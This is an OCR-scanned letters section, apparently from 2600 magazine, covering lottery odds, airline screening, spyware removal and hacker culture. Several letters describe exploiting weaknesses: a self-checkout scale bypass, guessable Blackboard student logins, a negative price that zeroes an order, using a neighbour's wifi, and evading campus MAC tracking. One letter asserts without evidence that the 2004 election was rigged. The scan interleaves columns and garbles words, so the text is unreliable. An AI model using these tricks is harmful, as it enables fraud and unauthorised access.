ances (high or low). Tolerance, therefore, imparts a been expelled/sued. Iwent i n and t h e people were sur-
"mechanistic effect" i n a drawing. For example, i f the Lot- prisingly friendly, not accusing me o f hacking or any
tery uses ping pong balls, the number one ball theoreti- other such stuff. They agreed t o patch t h e security holes
cally would be lighter than the number 16 ball. The and thanked me for my time. They d i d this even though I
number 48 ball may be heavier than the 16 ball. Even i f a could have potentially stolen admin access t o our net-
computer is used i n a drawing (no ping pong balls), com- work and consequentially SSNs from t h e students. This is
ponent tolerances would possibly still have an effect on especially dangerous because Igo t o a private school
the odds. which, while having a diversity of economic classes, also
There are also intervening factors (non-mathemati- has students who probably have i n excess o f several hun-
cal) which have a significant effect on lottery odds: dred thousand dollars i n their bank accounts.

,skillset, strategies employed, luck, foresight, organiza-


tion, and so forth. There are a few Legitimate lottery con-
Iam fairly sure that the admin knew Icould have
done this, but he still thanked me f o r my time and com-

Page 3 3 1
f
mended me for making the network secure. Hopefully ing t o this directory usually reveals quite a few
this will be a beacon of hope or something t o students executables (as well as a slew of temp files that aren't re-
everywhere. ally needed). Occasionally, spyware also lurks i n the
Steve c:\Documents and Settings\<user name>\Application
&Data\ folder as well, but it's a little more dangerous t o
Dear 2600:
start removing software from there as there might be
As one of the poor souls who happen t o work i n and
something you need.
around the airline industry i n these times Ican say that
The best way I've found to remove adware/spyware is
some of your points about the "selected" process is
t o install your spyware removal tools of choice (Spybot
wrong. You are right that if you see four S's on your
boarding pass that you have been selected for random Search and Destroy/Ad-Aware/CWShredder/Hijack This).
screening, but at the same time there are ways out of it Then, reboot i n Safe Mode, go t o the Add/Remove pro-
which I'llget into. You stated that people are targeted grams applet, and uninstall anything you find i n there
for the type of clothes they wear or what kind of hairstyle that you don't want. Then navigate t o the Local
they have. That is incorrect. Most of the time a person re- Settings\Temp folder Imentioned above and clean it
ceives the S's on their boardina Dass because thev buv a out. Then run your choice of spyware removal tools. Once
one-way ticket (most hijackers'have historical[; d i n e these are done, YOU may Want t o navigate t o the registry
this), paid cash (once again history backs this up), are t o check theRun that Patrick mentioned (HKw-
going t o a "hot spotMdestination, are (the worst one yet) ~C~rrent~USER\Software\Microsoft\Windows\Current
transfers from another airline, or somehow are on the -Version\Run).
government watch list. Good luck!
When you travel and see these S's on your ticket, Mogus
your ticketagent can remove them i n most cases. When
talking t o the ticket agent remember t o be polite and Dear 2600:
friendly. If you're not they can make your trip pretty bad. After writing the Article "Selfcheckout or ATM?" i n
If you are military traveling under orders you can easily 21:4 Idid a little more exploration with the NCR E-Series
get this removed by showing your I D and orders. I f you Selfcheckout systems. Ihave found that if you press the
happen t o share the name of someone on the watch list, help button before starting your order (or selecting a
contact your local FBI branch and they might be able t o language) it w i l l give you the choice of "Login" or "Call
get your name off the list. This does work as Ihave seen for Help." During this time you can put anything you
it done. want into the bagging area without alarm. Hitting the
While Idon't like all the rules set i n place Ido see a "Go Back" button will recalibrate the scale before the
need for some of them. When traveling remember that order is started.
the rules aren't meant t o restricttravel, just t o make sure Bob Krinkle
that it is done safely. As always, it's a bad idea to actually try and get away
Mouser-inc with physically stealing items. But learning where the
While the reasons you give are certainly used to jus- weaknesses are i n these machines is quite fascinating.
tify additional screening, people are also targeted be-
cause o f the way they look or act. The latter is most likely Questions
done by humans and the former by machines. But i n all
cases, it's pretty ineffecfive as anyone with an evil motive Dear 2600:
and halfa brain can easily alter any o f these parameters. One day Iwas messing around trying t o get netmeet-
Where the screening process is effeh've is i n getting the i n g t o work so an anxious friend could test his new mic. I
traveling public programmed to accept this kind o f treat- bypassed my router and connected directly t o my com-
ment since it's allegedly being done to keep them safe. puter's NIC. Inoticed that for the first time i n ages my
WAN IP address had changed. Curious like most, Ire-
Dear 2600: booted the modem t o see i f it changed again. It didn't.
Servus Casandro asked about writing an article on So Iconnected back t o my router, rebooted the modem
satellite television outside the U.S. There is already free- and voila, there was the old IP address again. Ihad noth-
to-air information published. Anyone with an IRD digital ing better t o do so Icloned the MAC from another NIC
down converter, a satellite dish, and an understanding and it got a new, different IP address. Each MAC Ien-
of how t o peak an antenna on a satellite with the appro- tered into the router's WAN side, fictitious or real, re-
priate LNA/LNB should look at http://www.global- tained a unique IP address that it pulled back after
cm.net/mpegZcentral.html. numerous MAC changes and reboots.
haydenlh
I s this normal?
Dear 2600: llx
Patrick Madigan's article i n 21:4 regarding the re- Yes, this is normal. DHCPservers assign I P addresses
moval of Ad-ware using various tools was fantastic. How- based on the MAC (physical) address requesting it. I f y o u
ever, as a sysadmin who's run into his fair share of users change your MAC address, the DHCP server will assign
who click "yes" t o just about anything under the sun, you a different I P address. Change the MAC address back
there's one thing I'd like t o add. Most spyware/adware and you'll be assigned the original address, provided the
hangs out i n the Temp directory, under the Local Settings lease did not expire. Be careful, though. ISPs noticing
folder on a machine (a hidden folder i n c:\Documents this acfivity tend to get upset and may suspend your ac-
and Settings\<user name>\Local Settings\Temp\). Go- count, requesting an explanation o f this acvtityi. Most
,
ing into an infected computer i n Safe Mode and navigat- terms o f service allow only one I P address per account.
\
/Dear 2600: to a cell phone and i t was the cell phone that was for-
It ain't easy being green. I have noticed through the warded. Verizon Wireless Airfone allows Verizon Wireless
years how often you refer t o intelligent people as "hack- customers to forward their cell phones directly to their
ers." Whether or not we have coined the term, i t is still seats on airplanes and bill calls from t h e plane to their
spent describing us. I don't condemn popular culture for cell phones a t much lower prices t h a n non-Verizon cus-
its misuse of labels as a way t o better understand its sur- tomers. (We suspect there must be numerous cases o f
roundings. However, I do question the morality of a pub- people who forget to "unforward" t h e i r phones when
lication with such high standards as 2600 using the term they leave the aircraft. We're curious whether or not sub-
"hacker" so loosely. Perhaps promoting this label is a sequent passengers wind up gem'ng all kinds o f un-
misinterpretation of what intelligent people do in their wanted calls as a result.)
spare time. Please correct me if I am mistaken.
David Oliver Dear 2600:
We'd like some more specifics as to how we're using I am under the impression that current cell phones
the term loosely. Hackers are curious and inquisitive by are GPS enabled for "emergency" location by those who
nature and will spend an awfully long time trying to find w a n t t o locate them. I f this is true, can t h e GPS function
results. That holds true of people writing computer pro- and phone location be displayed on t h e user's handset?
grams, scanning for interesting phone numbers, decrypt- Sometimes I too would like t o know where I am.
ing algorithms, defeating security systems, and any DP
number of other am'vities. They are all bound together Most recent cell phones do have a GPS receiver (as-
by a quest for knowledge andaren't inclusive or exclusive sisted GPS, to be more specific) contained within and are
of any pam'cular age group, sex, race, nationality, etc. usually clearly marked as having such a device. They are
Technology isnY even a requirement for the development as a rule only acfivated when using t h e E911 sem'ce and
o f a hacker mindset. But people who have no interest in are not continually receiving coordinates when an emer-
the actual learning process and are focused instead on gency call is not in progress. However, there is generally
stealing, intimidation, bragging, privacy invasion, and an admin/debug menu which allows f o r testing o f the de-
other such ends really aren't hackers in our opinion. The vice and therefore displaying your coordinates. The
mass media may disagree since they consider anyone method varies greatly based on the rnake/model ofyour
who touches a computer and then does something bad to cell phone, but there are often instructions to do this
be a hacker. That seems to be the epitome o f a "loose" posted online.
definition. Of course, it's also possible for someone t o
Dear 2600:
have a hacker mindset and then use that ability for evil
When I send you guys articles w i l l you edit them? I
purposes. But when they make that transition, they
mean, I spend more time editing t h e m than I do writing
pretty clearly leave the hacker world behind.
them. Would you be ever so kind as t o do that for me, or
Dear 2600: is that my job?
I was wondering if I could be able t o officially link t o William
your website from mine. My website is still in its beta All articles are edited for clarity and various other
form but is going t o be a computer related site. things. It's yourjob t o make your article as literate, fac-
Batman 24 tual, and interesting as possible. It's a lot less likely to
We don't know what you mean by "officially" but even be considered i f it's painful t o read.
regardless, no permission is necessary for you t o link
to anyone else on the net. Don't let anyone tell you Dear 2600:
otherwise. I am a former employee of a company that I want t o
write an article about. One thing I am worried about
Dear 2600: though is having them discover who wrote i t . What kind
I recently took a temp job and my employer gave me of protections do you offer for those who submit arti-
one of his cards so I would have his cell phone number. cles? Do you ever reveal where an article came from?
On this card were several phone numbers for the com- Dave
pany. One of the numbers was supposed t o be a toll-free We have never revealed the author o f an article to
number t o contact someone about bids/quotes. Instead, any authority or outraged corporation. However, people
when I dialed a computerized voice said "Welcome t o Ver- have been tracked down because o f t h e byline they used.
izon Wireless Airfone, your connection t o the skies. We So be very careful what you select a s your byline i f you
are now connecting you t o the aircraft." I did not stay on want to stay anonymous. Be aware t h a t sometimes your
the line long enough t o see if I would actually be con- username (not your full email address) may wind up be-
nected t o an airplane as I was trying t o sort out an issue coming your byline i f there's no other name given and no
regarding my pay check. Would this have been a toll-free request for anonymity. Be sure t o make any such re-
call and if I had stayed on the line would I have been quests in the same submission as separating them will
connected t o someone on an airplane? increase the odds that the wrong byline will be used. You
Jason should also be careful where you make submissions from.
It would certainly appear as if you were about t o be I f y o u want t o make a submission concerning a particular
connected to someone on an airplane. You will undoubt- company, it's not a good idea to use their mail servers t o
edly regret not embarking on this adventure for the rest send i t from. Also, be aware that using encryption won't
o f your life. As to how this happened, we suspect your necessarily help you in such a case a s the fact that you
company simply forwarded the toll-free number to follow sent email t o am'cles@2600.com will still be registered
whoever usually answered i t while they were traveling. (this incidentally is the only email address that accepts
( I t ' s also possible that this toll-free number always goes am'cles). An anonymous remailer would fix that but

page 35 1
/might raise other flags within the organization. We gen- login, the student would use his/her "NC Wise" numbe?
erally prefer cleartext ASCII from an address that you will (student ID number) as both their username and their
be reachable a t for some time. Many encryption attempts password. I n Wake County, a l l the students' NC Wise
wind up using incompatible keys o r versions and we very numbers start with 20, and then there are four random
quickly lose patience when there's a huge pile o f articles digits after 20, like 201234 or something. Therefore any-
to go through. one could enter 20, four random digits, and then get ac-
cess t o that student's grades and personalinformation. I
Dear 2600: tried a few myself and even accessed a teacher's account!
My friend has a sister who i s paranoid. She installed If Ihad wanted to, I could have changed a l l of his class's
a spyware program called " I Am Big Brother." He wants t o assignments, not t o mention his own password so that
get rid of it because it logs everything he does. Does he could not login. I j u s t wanted t o warn the community
anyone know any vulnerabilities? Iam going t o get rid of about Blackboard which is used i n schools nationally.
it myself at our school and he thinks it would be a good Students who use this and have the same login require-
idea. ments as Wake County does should change their pass-
Black-Angel words for better security.
We've been running a number o f am'cles about de- Public Display
tem'ng and removing spyware. There are different meth- I n a system as badly designed as this, one really has
ods for different programs. We're certain this one can be an obligation to demonstrate these monumental flaws.
defeated as well. We can only hope that the irony o f a The irony is that anyone doing this would be blamed for
sister running a program called "IAm Big Brother" and the privacy invasion rather than those who designed this
creating paranoia to address her own isn't lost on any- travesty. We hope this opens some eyes and we invite
one. Incidentally, the program can be found a t anyone else living with such poor security to l e t us know.
http://www.iambigbrother.org/.
Dear 2600:
Appeals There i s a State of CaGfornia website t h a t lets you
submit a license plate or VIN number t o show the smog
Dear 2600: certifications for that vehicle. When you enter a VIN or
There i s a neo Nazi site currently distributing tens o f plate it shows both the VIN and plate for that vehicle. It
thousands of hate music filled CDs. Please let the 2600 makes it easy for car thieves t o stamp out fake VIN tags
network know. I hope t h a t someone w i l l choose t o t r y t o match the plate. The site is a t http://www.smogcheck.
and shut down this site. Iknow it's against many hackers' sca.gov/vehtests/pubtstqry.aspx.
ethics to wreck people's sites, but I hope that someone gmitch
will make an exception i n this case. We have t o stop Why such information is available t o the world is
these kinds of evil people! Please use t h e power of your beyond us. But it enabled us to learn that there used to
group to rid the world of an outlet for f i l t h and hatred. be a 1989 Buick Century out there with a "2600" plate
Ionly know about 2600from online wanderings back that has since changed to a more normal plate, possibly
i n high school. I have no computer skills or hacker due to a sale. By what twisted logicshould anyone i n the
friends. You guys were the only thing Icould think of t o world be able to have access to this information plus a
stop this. Please help! whole l o t more?
DB
Think about what happens when someone tries this Appreciations
tactic on us. We wind up getting more support than ever
before from people and places we never would have been Dear 2600:
i n touch with ordinarily. By attempting this on others, I want t o thank you with a l l my heart for your steady
you're opening up the same type o f support for them. I n voice against war. I f TAP was s t i l l publishing, I believe
other words, you'll be making them stronger. You should they might be holding strong as well. But so many others
have the ability to counter hate speech with words and have caved. Disheartening t o say the least.
logic, rather than resorting to desperate measures. You Ijoined the army right when Operation Sundevil be-
need to be attacking the cause o f the problem, n o t j u s t gan (probably beating politicalimprisonment by t h e skin
the symptoms. The assumption that shum'ng down sites of my teeth) and I've always known how many from your
is what hackers are all about simply strengthens the in- readership are conservative libertarians. So it takes guts
accurate mass media perception o f us. Any idiot can use for you t o speak out.
brute force to try and shut someone up. Let's hope that Thanks for being you.
we're all a few steps above that. marco (aka prime anarchist)
You're welcome. But we doubt we've cornered the
Utter Stupidity market on opposing the senseless waste o f human life.
There are many "conservative libertarians" speaking out
Dear 2600: as well.
Iam a high school student i n Raleigh, NC. My high
school belongs t o the Wake County Public School System Dear 2600:
and they use Blackboard for online teacher-student rela- Ijust wanted t o write t o say that I picked up my first
tions. On Blackboard a student can login and access their copy o f 2600a few days ago and read it over. For the last
grades for certain classes, read announcements from two years Ihave developed a love for computers and
their teachers, and turn i n assignments electronically. I have wanted t o know everything I could possibly learn
was introduced to this system i n my Programming I1 class about them. I don't know much but I know more than
\ a n d Ithought it was kind o f strange that i n order t o most around me. I owe part of that t o people like the
\
saying a friend bought it. He proceeded t o ask me i f I
knew what the magazine was, what 2600stood for, and a
host of other questions. Immediately I felt bad for lying.
He seemed t o be genuinely excited a n d knowledgeable.
Robbie Brewer Inever caught his name, though h e did mumble his
alleged former phreaker handle. He went on t o talk
Dear 2600: about Cap'n Crunch, blue boxing, red boxing, trunk dial-
Ijust wanted t o let you guys know that Ilove the ing, the meetings a t Union Station here i n Los Angeles,
magazine. Ilove it so much Ijust might name my first how he may have single-handedly driven Sprint t o switch
born "Twenty Six Hundred." I'm saving for the "all back from five digit authorization codes t o seven t o 14, and
issues and lifetime subscription" deal. Question: How how he never bothered t o learn computers because he
long will those "special prices" last? was afraid he'd be a danger t o society and himself. I
Rob Hundred almost wish Icould have ridden t h e rest o f t h e way with
The prices go up occasionally as more back issues be- him, but my stop came before his a n d Iwished him a
come part o f the package. But we'll always try to have good day.
good deals for people o n our Internet store Of course, part o f me is skeptical. Though he was
(store.2WO.com). We suggest buying them before your quite convincing, Ican't help but wonder if he truly was
first born grows up and kills you for giving him/her that a part of the phreaking scene. And if h e did f a l l through
name. the cracks, how? And why? Maybe w e ' l l cross paths an-

I Security Issue
other day, and Ican treat him t o lunch and hear his sto-
ries. Or maybe someone reading this knows exactly who
I'm talking about. Either way, it definitely made for an
Dear 2600: interesting morning and Ithought I'd share it with you.
Entering my third decade of paranoia Idid some web aaron
searches through google t o find out how "far outthere" I Yet another instance o f our shirts bringing people
am. Not using complicated google hacks or anything like together.
that I simply used my paranoia and hatred of "big
brother" t o aid me. A few years ago Irealized that every- Dear 2600:
one will be arrested, jailed, or ticketed for the most mi- Six year reader, first time writer. I have a confession
nor offenses but the paper trail has made its way online. t o make t o you guys: I'm addicted t o free Internet. I've
Just about every police department, jail, or correctional been accessing my neighbor's wireless high speed Inter-
facility has a website and often posts the offenders on- net connection for about a year now. It started off small
line including name, age, phone, and (gasp) Social Secu- a t first, just an HP Pavilion laptop w i t h a Linksys wifi
rity numbers so i f you were t o dive into these records you card. Iwould only connect t o the network when Iwas ex-
could trace someone back as far as the early 90s and pecting an important email and t h e like. But then I
have more than enough evidence t o steal their identi- started connecting all the time and staying connected. It
ties. got worse. When the signal wasn't strong enough and
Brian wouldn't connect me, Iwould get t h e high speed with-
I f it wasn't so sad it would be funny that these orga- drawals. Ihave since gotten greedier and now have a
nizations are giving such ammunition to future potential network of two PCs, two printers, a range expander, said
criminals. This seems to be y e t another way that prison- laptop, and Ieven have plans t o b u i l d t h e "Cantenna"
ers are being punished above and beyond their actual (www.oreillynet.com/lpt/wk~/448), a l l running wire-
sentences. lessly and connected t o my neighbor's Internet. The

I Experiences
paradox is this: Iwould never have learned all the things
Idid t o set up this pirated network if t h e y had simply se-
cured their router properly. It's n o t m y fault that when
Dear 2600: installing their connection, they j u s t clicked "Next" 15
I've worn my 2600 shirt on many occasions, not t o times, is i t ? I've never actually damaged anything on
show off but t o support the magazine and the informa- their end and I have no intention o f doing so (even
tion it disseminates. As a NOC monkey on Telco Alley i n though they had logs disabled, so t h e y wouldn't know
downtown LA, Ifind public transportation the best way what went wrong anyway). Just a random thought Ihad
t o get t o and from work and, while the thought of being today. Thanks for listening. Keep up t h e great work guys.
accosted for having a shirt with the word "Hacker" on it Mi key B
has crossed my mind, I've never cared enough not t o
wear it on my way t o work. Observations
This morning, halfway t o work, an uncannily friendly
vagrant hoped on the bus. His glasses missing a Lens, Dear 2600:
hair disheveled, and his suitcase covered i n layers of dis- While Iwas visiting a well-respected drive-cloning
carded plastic, he carried his three string guitar i n one company's website, Inoticed an interesting ad. The ad
hand and wheeled the suitcase i n another, excusing him- flashed an image of a young girl and t h e n commented on
self and politely notifying people t o watch their toes. His how they were fighting child exploitation. Another pic-
demeanor struck me as odd, only because I've spent the ture of a building blowing up and a comment that they
past three years of my life being hardened by literally in- were fighting terrorism. The next picture was of a cop
sane vagrants riding the bus. holding weed arid the note that drug use is a t an all time
Suddenly, while gazing out the window I hear a high. The last frame was the one t h a t intrigued me. The
("2600! Oooooh! I s that your shirt?!" Instinctively Ilied, caption read "Hackers cost the world economy billions"
/and the image was of a computer screen with the 2600 "Leet words can be expressed in hundreds of ways us?
website loaded. I was surprised t o see that as I am an ing different substitutions and combinations, but once
avid fan of 2600 and know that you don't promote the one understands that nearly all characters are formed as
malicious use of information. Keep up the good work, phonemes and symbols, leetspeek isn't difficult to trans-
guys! late. Also, because leet is not a formal or regional di-
k~ l e alect, any given word can be interpreted differently, so
Even more unbelievable than the existence o f this it's important to use discretion when evaluating terms.
site is the fact that you didn't tell us its name. Fortu- The following serves as a brief (and by no means defini-
nately, other readers shared this info. tive) introduction to leet through examples.
"Numbers are often used as letters. The term 'leet'
Dear 2600: could be written as '1337,' with '1' replacing the letter L,
I suspect you are aware of this but if not: 2600is fea- '3'posing as a backwards letter E, and '7' resembling the
tured as one of the evils in the ad at http://logicube.com letter T. Others include '8' replacing the letter B, '9' used
u/products/hd-duplication/md5.asp. as a G, '0' (zero) in lieu o f 0, and so on.
scotk "Rules of grammar are rarely obeyed. Some leet-
It's amazing to us that terrorism, child exploitation, speekers will capitalize every letter except for vowels
drug trafficking, and white collar crime are all repre- (LiKe THiS) and otherwise reject conventional English
sented with generic images but when i t comes to "cyber style and grammar, or drop vowels from words (such as
crime," they have no problem sticking our name up there converting v e y to 'vy7.
in lights. While most other organizations would contem- "Mistakes are often left uncorrected. Common typing
plate legal action, we'll simply issue a standard Level One misspellings (typos) such as 'teh' instead of the are left
electronicjihad. We mustn't disappoint after all. uncorrected or sometimes adopted to replace the correct
spelling.
Dear 2600: Leet words o f concern or indicating possible illegal
I was recently looking around on www.skinit.com for activity:
cell phone or PDA skins. I was looking at the skins for the 'warez' or 'w4r3z8:Illegally copied software available
Sidekick I1 and went through the whole purchase process for download.
without the intent of actually buying (probably because I 'h4x1: Read as 'hacks,' or what a malicious computer
don't even have a Sidekick). But there was one thing I hacker does.
noticed. When you buy a skin you choose the picture you 'prOn? An anagram o f porn,' possibly indicating the
want the skin to have and at the bottom of the window i t use of pornography.
has a space that shows the price (usually $0) and then i t 'sploitz' (short for exploits): Vulnerabilities in com-
charges you $9.95 for the skin itself. What I realized is puter software used by hackers.
that if you type "-9.95" in the price space i t will take that 'pwnc:A typo-deliberate version of own, a slang term
off the final order. This is a way t o get all the skins you often used to express superiority over others that can be
want for free (or at Least until one of the skinit employ- used maliciously, depending on the situation. This could
ees reads 2600). Maybe you can even make money off of also be spelled 'O\/\/n3d1 or 'pwn3d,'among other vari-
this! ations. Online video game bullies or 'griefers' often use
SystemDownfall this term."
Maybe you can even start a life of crime just by typ- Dear 2600:
ing in some numbers on a web page. This is an example This letter is for informational purposes only as I
of a really poorly designed interface, many of which exist don't have enough knowledge of the legahties t o say
on the net. Or i t could be a really well designed interface whether or not you could possibly get in trouble for it.
to compile a database of dishonest people. On that note, access rules may vary from campus t o cam-
pus.
Dear 2600:
I n this example I will use Michigan State University's
Check i t out ... M S teaches parents t o understand
network, due t o the fact that I have personal experience
their children's "133t speak" - http://www.microsoft.com with their network. But many college campuses are set
~/athome/security/children/kidtalk.mspx. up similarly.
Doda McCheesle When you first connect your computer t o the ether-
This is a must read for anyone who wants to laugh net ports on campus (anywhere around campus), you are
all night. We wonder i f future archaeologists will be prompted t o enter a username and password (provided
studying this language with the same attention given to by the school and tied t o your academic account). This is
ancient Greek. Some highlights: fine for most people. When you enter your name/pass
"While it's important to respect your children's pri- you will be linking your ethernet MAC address t o your ac-
vacy, understanding what your teenager's online slang count. You are allowed t o register multiple MAC ad-
means and how to decipher could be important in certain dresses, but the point is that they all tie t o your student
situations and as you help guide their online experience. account. To get around this ( I personally don't like hav-
While i t has many nicknames, information-age slang is ing my Internet behavior tied t o my student account),
commonly referred to as leetspeek, or leet for short. Leet get a used network card. On college campuses there are
(a vernacular form of 'elite7 is a specific type o f com- always people looking t o sell used computer equipment.
, puter slang where a user replaces regular letters with At MSU, we have an active student community with clas-
other keyboard characters to form words phonetically - sified ads. When purchasing a used ethernet card, there

I creating the digital equivalent of Pig Latin with a twist of


hieroglyphics.
is a very good chance that the last owner didn't remem-
ber t o remove the registration from his/her card before

EL00 flagazine J
(elling it. Pop that i n your machine, plug in, and you the Chapters, it was shown on my b i l l as "2600 Hacker
\
should be able t o stay away from easy tracking. Quart" which Ifound terribly interesting.
Like Isaid, many other universities use the same Freezing Cold 2600 Fan
MAC/account registration. Just something t o think
about. Dear 2600:
Impact Saw a letter i n t h e latest issue o f 2 6 0 0 t h a t this guy
can't get it a t Chapters i n Canada. Just s o you know, I get
Dear 2600: it there a l l the time, including this issue.
Check out the hacking/puzzle game on Terry
www.ninebows.com. There are nine steps and it seems That's a pretty neat trick.
like nobody can get past t h e second. Google it and you
can find some really long forum threads about it too. Responses
fv Dear 2600:
I t ' s a good way to lose your mind without having to
leave the house. Ienjoyed reading t h e mathematical analysis i n How
t o Hack the Lottery (21:3) but Iexpected more from
Dear 2600: 2600and was disappointed the author failed t o take i n t o
Not only i s Ikea a great store t o buy stuff, it's loaded account t h e human factors i n t h e equation.
with workstations t o lay their products out on. Although The author i s correct t h a t you c a n n o t fundamentally
Ididn't play too much, Iwas able t o connect t o t h e other change the odds but what you can do i s balance t h e risk
XP PCs on the network, go i n t o the C drive, change the t o reward ratio. The purpose o f a l o t t e r y syndicate i s n o t
screensaver (but Iput it back), and create and delete a t o increase your odds of winning b u t t o share both t h e
test text file on t h e desktop. risks and the rewards over t h e long run.
Iwas feeling a b i t paranoid so Ididn't bring up IE or He also says there i s no need t o s t a y away from pat-
write down the IPS but Ihave a feeling it would have terns as all numbers have an equal chance o f coming up.
been fun. During t h e rest of my visit i n the store Icould- While t h a t is true on one level there w i l l always be some
n't spot a single security camera. Imust go back and people playing t h e obvious patterns l i k e 1,2,3,4,5,6. Al-
play. though t h e odds are no difference if you did win you
Rifkey would have t o split t h e prize with many more people. I f
you want t o t r y and maximize your p o t e n t i a l winnings it
Dear 2600: helps t o pick a combination that i s n o t t o o likely t o col-
Istumbled on sort o f a "security through obscurity" lide with other people's choices. It i s a llabout balancing
type approach t o securing a SOHO router, such as a the risks against the rewards.
linksys. As you know, most SOHO routers have an inter- Having said all that, it i s worth remembering t h e
face which i s accessible through port 80 or http://ip-ad- quote: "The lottery is a tax on t h e mathematically
dress which is sometimes accessible publicly. To drive challenged."
away people attempting t o login t o your router (you ob- Alan Horkan
viously want t o change the default password), you can Dublin, I r e l a n d
also forward port 80 t o a machine that doesn't exist. The author o f the piece, Stankdawg, replies:
When they t r y t o login t o your router they w i l l be given "A 'lottery syndicate' is a term t h a t simply refers to
an error message that the host was not found. Just an people gem'ng together i n a group t o t r y t o increase
added layer o f protection. their chances o f winning b u t a t the risk o f having to
p4p3r t l g 3 r share the payout with the other members. I t is exactly
Dear 2600: what y o u describe, a risk-to-reward approach o f playing.
Iwas looking around at archive.org, and noticed that I absolutely touched on this in m y a r t i c l e i n the first
you can submit a URLand they will bring up archived ver- paragraph under the header 'Myths' since it is a very
sions o f the site. Ityped www.2600.com and found quite common theory.
a few older versions .... Iwas browsing one of t h e older T used a small example o f a 'syndicate' referring to
versions of your site and saw the link: "Mirror DeCSS." I office pools o f lottery players. Choosing 2 0 picks o u t o f
clicked on it and sure enough they have a l l of the mirrors almost 1 6 million is still pretty small, b u t b y increasing
still linked, even though you were forced t o take the syndicate y o u could continually increase your
them o f f of your page .... Ijust thought you might find chances o f winning right up to the p l a y every number'
theory. A t the same time, however, you are causing the
this interesting. Iwonder i f the MPAA is going t o sue
archive.org as well for archiving a page with "illegal amount o f winning to decrease due t o the shared win-
content." nings with each additional syndicate member. This is a
drlecter true statement. Some people who believe i n this
myth/theory think that they will win m o r e frequently due
Dear 2600: to the odds being better (keep i n m i n d t h a t they are still
Just wanted t o let the fans of 2600 know that Canada phenomenal) and even if they have t o share it, it will pay
is certainly still.selling t h e magazine. I n fact, i n South- o f f in the long run through repeated small wins o r one
ern Ontario Ihappened i n t o a Coles Bookstore (in Brant- b i g win.
ford) and Chapters (in Ancaster) and found copies i n "The problem here i s that it is j u s t as much o f a the-
both locations. So Isuspect the other stores that were ory as everything else. I t will take l o n g term analysis to
visited may have been sold out or had the copies hidden decide whether it does pay o f f i n t h e l o n g run. Without
away. I n both locations 2600 was displayed clearly i n the going i n t o the business viewpoint t h a t money that does-
( f r o n t row of magazines. When Ipurchased my copy from n't earn interest is actually losing m o r e money, I will

Page 34'
/;imply point a t the facts. Do a search for 'lottery s y n d t i n 21:4. I'm an Australian too, so Inormally write the\
cate wins lottery' and you will n o t find any large syndi- date dd-mm-yyyy. WhiteHat seemed t o think that this
cates winning any Large amounts o f money with any was another logical suggestion but he's completely
regularity. Iwould debate that any individual wins b y a wrong.
syndicate were b y random chance more than any 'sys- On a computer if you write the date as dd-mm-yyyy,
tem.' files end up out of order. 01-01-1985 comes before 12-
"Looking a t the facts, Isimply do n o t see enough ev- 12-2004 (files from each year would be mixed up with
idence to say that syndicates are any more successful each other). Whitehat's response is a bit pointless, but
then individual groups. Isaw a few office groups that mostly annoying.
won the lottery, b u t this happened without any large BitPirnp
syndicate effem'veness. I f these syndicate systems
worked, wouldn't more people have seen and heard Dear 2600:
about the success stories? I t is kind o f hard t o hide a pat- Imissed the original article but am responding t o
tern o f success i n winning the lottery! These were small the Letter by WhiteHat i n t h e current issue of 2600
office groups with only one that was over 3 0 people. (21:4).
Even then, it was the same simple luck b y which individ- Whilst you find dd-mm-yyyy logical and familiar, the
ual winners have won. Even if a syndicate o f 500 people main objection t o that format is that for the first 12 days
won I 0 million dollars, when you split that up they get o f every month it is impossible t o t e l l if the date is i n dd-
$20,000 each. Most syndicates look to be around 50 peo- mm-yyyy or i n mm-dd-yyyy format with obvious conse-
ple i n number depending on the lottery i n question so quences.
that they guarantee smaller wins while hoping for 'the With the date written like 2005-03-01 this i s always
b i g one.'It is definitely an increase i n your odds which I yyyy-mm-dd because no one uses yyyy-dd-mm a t all.
stated i n my article, b u t it is still ridiculously stacked There is only one interpretation for that date.
This has already been decided i n International Stan-
against you no matter what.
"Common sense comes into play here. I f a syndicate dards such as IS0 8601, and earlier IS0 standards back as
far as 1971; and i n Internet RFC documents such as RFC
were really that effecfive, don't you think the lottery
3339.
would rig it with more numbers to nullify that effecfive-
Many programs, applications, data formats, and
ness? Trust me, they have done their homework and they
websites already use the "new" format and there i s a
are glad to let the syndicates pump up the jackpot for
large amount of information about this topic t o be found
them. They know that i n the long run, they will always
on the Internet.
win.
splke
"In m y opinion, if I were going to play the lottery, I
would take my dumb luck chance a t a 1 0 million dollar Dear 2600:
payday than sharing it with 499 others. Of course this is Iam writing i n response t o Jeff's letter i n 21:4 re-
my opinion, and others may disagree. But I will keep my garding hacking a voting machine. Hacking a voting ma-
money i n my pocket. " chine is such a minor issue compared t o corruption. It's
no coincidence that Diebold's new touch screen voting
Dear 2600:
machines have no paper trail. Diebold also makes ATMs,
My letter is i n response t o LabGeek's letter i n 21:4. I
checkout scanners, and ticket machines, all of which log
had the privilege of working as part of the management
each transaction and can generate a paper trail.
team of a new Wal-Mart i n the Northeast. The yellow line
It is also not mathematically possible for uncor-
i s drawn as a guide for shoppers so they can visualize
rupted machines that a l l (not some) of the voting ma-
where the border is. The actual border i s created by a
chine errors detected and reported i n Florida i n 2000
wire running underground. The system is based on RF,
were i n favor of Bush or Republican candidates. However,
though Ido not know the actual frequencies or t h e
that i s what happened.
range. We have tried lifting the carts a foot o f f t h e
It's also no coincidence that Walden O'Dell, Chairman
ground, but the locks still engaged. Amusingly, per
and CEO of Diebold is a major Bush campaign organizer
2600's response, we were successful i n getting over the
and donor who wrote i n 2003 that he was "committed t o
barrier by lifting the carts above our heads.
helping Ohio deliver i t s electoral votes t o the president
Jaypoc next year."
Dear 2600: It's also no coincidence that exit polls i n Ohio during
It looks like the article i n 21:l ("Setting Your Music t h e general election i n 2004 showed Kerry should have
Free") and the response i n 21:3 from Cameron both mis- taken Ohio by four points, yet the votes actually recorded
takenly refer t o AAC codec as an Apple Product. The AAC gave Ohio, and thus the country, t o Bush.
(Advanced Audio Coding) was developed by Dolby Labs It's also no coincidence that votes recorded i n eight
and is integrated into MPEG-4. Apple is merely an early of the other ten battleground states differed from exit
adopter of the technology, incorporating MPEG-4 polls by between 2.2 and 9.5 points, and a l l discrepan-
i n t o their latest QuickTime, making it the default codec cies (not some) favored Bush (an impossible anomaly).
i n iTunes, and adding support for it i n their hardware Note that this is not a partisan issue. I'm a registered
players. Republican. But that is n o t t h e point. The point is that
Alop t h e public vote doesn't count i n the U.S. since the elec-
tion appears t o be rigged.
Dear 2600: The hackers are the ones who wrote t h e software for
First off guys, great mag, radio show, con, DVD.... the voting machines i n the first place. No need t o pick
